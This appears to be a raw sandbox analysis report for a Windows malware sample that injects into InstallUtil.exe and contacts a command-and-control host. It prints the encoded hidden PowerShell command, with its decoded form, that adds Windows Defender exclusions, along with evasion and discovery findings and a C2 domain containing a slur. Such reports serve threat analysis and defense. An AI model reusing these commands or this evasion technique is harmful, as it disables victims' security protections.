                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F29F0 LdrInitializeThunk,0_2_057F29F0
                      Source: C:\Users\user\Desktop\test.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\test.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                      Source: unknownProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\tina\AppData\Local,C:\Users\tina\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess Product.exe;
                      Source: unknownProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\tina\AppData\Local,C:\Users\tina\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess Product.exe;
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 496000Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 498000Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 92A008Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcahqaaqbuageaxabbahaacabeageadabhafwatabvagmayqbsacwaqwa6afwavqbzaguacgbzafwadabpag4ayqbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabqahiabwbkahuaywb0ac4azqb4aguaowa=
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcahqaaqbuageaxabbahaacabeageadabhafwatabvagmayqbsacwaqwa6afwavqbzaguacgbzafwadabpag4ayqbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabqahiabwbkahuaywb0ac4azqb4aguaowa=
                      Source: C:\Users\user\Desktop\test.exeQueries volume information: C:\Users\user\Desktop\test.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeQueries volume information: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeQueries volume information: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Product.exe, 00000004.00000002.1561050720.0000000005C6C000.00000004.00000020.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2212887995.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2212887995.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Product.exe, 0000000C.00000002.2237234313.0000000005690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\test.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                      Windows Management Instrumentation
                      11
                      Scheduled Task/Job
                      311
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping131
                      Security Software Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      11
                      Scheduled Task/Job
                      1
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts11
                      Scheduled Task/Job
                      Logon Script (Windows)1
                      DLL Side-Loading
                      141
                      Virtualization/Sandbox Evasion
                      Security Account Manager141
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell
                      Login HookLogin Hook311
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture1
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information
                      LSA Secrets123
                      System Information Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information
                      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Timestomp
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574666 Sample: test.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 35 iam.nigga.dad 2->35 39 Antivirus / Scanner detection for submitted sample 2->39 41 Yara detected AntiVM3 2->41 43 .NET source code contains potential unpacker 2->43 45 9 other signatures 2->45 7 Product.exe 3 2->7         started        10 test.exe 7 2->10         started        13 powershell.exe 23 2->13         started        15 2 other processes 2->15 signatures3 process4 file5 47 Antivirus detection for dropped file 7->47 49 Machine Learning detection for dropped file 7->49 51 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 7->51 55 3 other signatures 7->55 17 InstallUtil.exe 2 7->17         started        27 C:\Users\user\AppData\Local\...\Product.exe, PE32 10->27 dropped 29 C:\Users\user\AppData\Local\...\test.exe.log, CSV 10->29 dropped 31 C:\Users\user\...\Product.exe:Zone.Identifier, ASCII 10->31 dropped 53 Loading BitLocker PowerShell Module 13->53 21 WmiPrvSE.exe 13->21         started        23 conhost.exe 13->23         started        25 conhost.exe 15->25         started        signatures6 process7 dnsIp8 33 iam.nigga.dad 103.230.121.81, 30120, 49705, 49706 VPSQUANUS Hong Kong 17->33 37 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 17->37 signatures9

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      test.exe100%AviraHEUR/AGEN.1360822
                      test.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe100%AviraHEUR/AGEN.1360822
                      C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      iam.nigga.dad
                      103.230.121.81
                      truefalse
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://schemas.microsotest.exe, 00000000.00000002.1519417039.0000000005F16000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1704194761.00000251C3F32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/mgravell/protobuf-netitest.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://stackoverflow.com/q/14436606/23354test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2722239626.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2217363905.000000000291D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/mgravell/protobuf-netJtest.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.microsopowershell.exe, 00000002.00000002.1746251721.00000251CC70A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1590895371.00000251B40E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://stackoverflow.com/q/11564914/23354;test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://stackoverflow.com/q/2152978/23354test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1590895371.00000251B40E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000006.00000002.1732006045.0000019376FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/powershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1704194761.00000251C3F32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Licensepowershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/mgravell/protobuf-nettest.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.1590895371.00000251B3EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1586950677.0000019300001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametest.exe, 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1590895371.00000251B3EC1000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003471000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2722239626.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2722239626.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1586950677.0000019300001000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2217363905.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2217363905.000000000291D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  103.230.121.81
                                                                  iam.nigga.dadHong Kong
                                                                  62468VPSQUANUSfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1574666
                                                                  Start date and time:2024-12-13 13:26:14 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 13s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:14
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:test.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.evad.winEXE@10/13@1/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 80%
                                                                  HCA Information:
                                                                  • Successful, ratio: 92%
                                                                  • Number of executed functions: 174
                                                                  • Number of non-executed functions: 116
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
